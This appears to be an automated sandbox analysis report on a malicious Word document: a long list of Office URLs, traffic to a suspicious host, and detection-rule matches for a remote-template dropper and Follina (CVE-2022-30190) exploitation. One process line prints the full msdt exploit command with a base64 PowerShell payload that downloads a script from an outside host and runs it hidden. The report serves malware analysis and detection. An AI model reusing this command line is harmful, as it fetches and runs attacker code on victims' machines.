            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://graph.windows.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://graph.windows.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://invites.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://lifecycle.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows.local
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://management.azure.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://management.azure.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.action.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.engagement.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://messaging.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ncus.contentsync.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ncus.pagecontentsync.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officeapps.live.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://onedrive.live.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://osi.office.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://otelrules.azureedge.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pages.store.office.com/review/query
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://powerlift.acompli.net
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://roaming.edog.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://settings.outlook.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://staging.cortana.ai
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://tasks.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: ~WRS{EC60D62E-A2BB-4EAD-A7F3-2736EF3773E3}.tmp.0.drString found in binary or memory: https://upgrade.4nmn.com/microsoft.html
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://webshell.suite.office.com
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://wus2.contentsync.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://wus2.pagecontentsync.
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 1A14DD78-7595-4E74-B4A0-6406491222F4.0.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: unknownDNS traffic detected: queries for: upgrade.4nmn.com
            Source: global trafficHTTP traffic detected: GET /microsoft.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: upgrade.4nmn.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /microsoft.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: upgrade.4nmn.comIf-Modified-Since: Sat, 18 Jun 2022 06:13:07 GMTIf-None-Match: "b0474a7ada82d81:0"Connection: Keep-Alive
            Source: unknownHTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.251.9:443 -> 192.168.2.3:49745 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
            Source: amsi32_1320.amsi.csv, type: OTHERMatched rule: Recon_Commands_Windows_Gen1 date = 2017-07-10, author = Florian Roth, description = Detects a set of reconnaissance commands on Windows systems, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://goo.gl/MSJCxP
            Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
            Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: 00000019.00000003.452130269.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Recon_Commands_Windows_Gen1 date = 2017-07-10, author = Florian Roth, description = Detects a set of reconnaissance commands on Windows systems, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://goo.gl/MSJCxP
            Source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: Process Memory Space: msdt.exe PID: 7052, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-14
            Source: Process Memory Space: powershell.exe PID: 1320, type: MEMORYSTRMatched rule: Recon_Commands_Windows_Gen1 date = 2017-07-10, author = Florian Roth, description = Detects a set of reconnaissance commands on Windows systems, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://goo.gl/MSJCxP
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\microsoft[1].htm, type: DROPPEDMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, type: DROPPEDMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7BB121F.htm, type: DROPPEDMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\5db65c7.ps1Jump to behavior
            Source: DiagPackage.dll.mui.7.drStatic PE information: No import functions for PE file found
            Source: DiagPackage.dll.7.drStatic PE information: No import functions for PE file found
            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
            Source: WF0SlQWKr1.docxVirustotal: Detection: 20%
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdQBtAG0AaQB0AC4AZABpAGQAbgBzAC4AcgB1AC8AZgBvAHIAYgBlAHMAdAAuAHAAcwAxACcALAAgACcAQwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwApACAAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgByAGUAcwB0AHIAaQBjAHQAZQBkACAALQBGAGkAbABlACAAQwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
